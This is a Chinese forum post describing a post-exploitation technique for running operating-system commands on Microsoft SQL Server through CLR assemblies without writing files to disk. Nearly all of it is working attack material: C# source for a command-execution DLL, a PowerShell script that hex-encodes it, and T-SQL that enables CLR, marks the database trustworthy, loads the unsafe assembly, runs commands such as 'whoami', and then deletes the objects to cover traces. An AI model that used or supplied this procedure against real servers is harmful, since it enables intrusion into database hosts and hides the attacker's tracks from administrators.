|
本帖最后由 gclome 于 2020-10-26 08:56 编辑
原文链接:MSSQL[CRL]不落地执行
一、mssql clr介绍:
在 mssql 2005 之后的版本中,默认新增了对 clr 的支持,支持.net 框架
二、利用过程
首先创建一个dll,dll的功能命令执行
- using System; using System.Data; using System.Diagnostics; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.Threading; using System.Runtime.InteropServices; namespace Hi.Test { public class SQLClr { public static string Run( string proc, string arg ) { try { Process p = new Process(); p.StartInfo.FileName = proc; p.StartInfo.Arguments = arg; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardError = true; p.Start(); p.WaitForExit(); return(p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd() ); } catch ( Exception ex ) { return(ex.ToString() ); } } public static void RunProc( string proc, string arg ) { SqlDataRecord record = new SqlDataRecord( new SqlMetaData( "ret", SqlDbType.NVarChar, 4000 ) ); SqlContext.Pipe.SendResultsStart( record ); record.SetString( 0, Run( proc, arg ) ); SqlContext.Pipe.SendResultsRow( record ); SqlContext.Pipe.SendResultsEnd(); } public static string ProcessArch() { return(Marshal.SizeOf( typeof(IntPtr) ) == 8 ? "x64" : "x86"); } [DllImport( "kernel32.dll" )] static extern IntPtr VirtualAlloc( IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect ); } }
复制代码
本地编译后生成dll文件:C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /target:library c:\1.cs
因为要不落地执行,所以要把生成出来的文件转成hex,用到powershell转成hex
- $assemblyFile = "C:\Users\hello\Desktop\1.dll"
- $stringBuilder = New-Object -Type System.Text.StringBuilder
- $stringBuilder.Append("CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM `n0x") | Out-Null
- $fileStream = [IO.File]::OpenRead($assemblyFile)
- while (($byte = $fileStream.ReadByte()) -gt -1) {
- $stringBuilder.Append($byte.ToString("X2")) | Out-Null
- }
- $stringBuilder.AppendLine("`nWITH PERMISSION_SET = UNSAFE") | Out-Null
- $stringBuilder.AppendLine("GO") | Out-Null
- $stringBuilder.AppendLine(" ") | Out-Null
- $stringBuilder.AppendLine("CREATE PROCEDURE [dbo].[clr_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[clr_exec];") | Out-Null
- $stringBuilder.AppendLine("GO") | Out-Null
- $stringBuilder.AppendLine(" ") | Out-Null
- $stringBuilder.AppendLine("EXEC[dbo].[clr_exec] 'whoami'") | Out-Null
- $stringBuilder.AppendLine("GO") | Out-Null
- $stringBuilder.AppendLine(" ") | Out-Null
- $stringBuilder.ToString() -join "" | Out-File d:\2221.txt
复制代码
利用上面的那段 hex 创建存储过程,执行系统命令,单句执行。
use msdb;
alter database master set trustworthy on;
exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'clr enabled',1;reconfigure;
create assembly sysinfo from 0x..... with permission_set=unsafe;
create procedure sysinfo_run_proc(@proc nvarchar(max),@arg nvarchar(max)) as external name sysinfo.[Hi.Test.SQLClr].RunProc;
create function sysinfo_run(@proc nvarchar(max),@arg nvarchar(max)) returns nvarchar(max) as external name sysinfo.[Hi.Test.SQLClr].Run;
select msdb.dbo.sysinfo_run('whoami','/user')
利用完毕之后删除创建的存储过程,恢复clr为原始状态
drop function sysinfo_run;
drop procedure sysinfo_run_proc;
drop assembly sysinfo;
exec sp_configure 'clr enabled',0;
RECONFIGURE WITH OVERRIDE;
exec sp_configure 'show advanced options',0;
RECONFIGURE WITH OVERRIDE;
|
|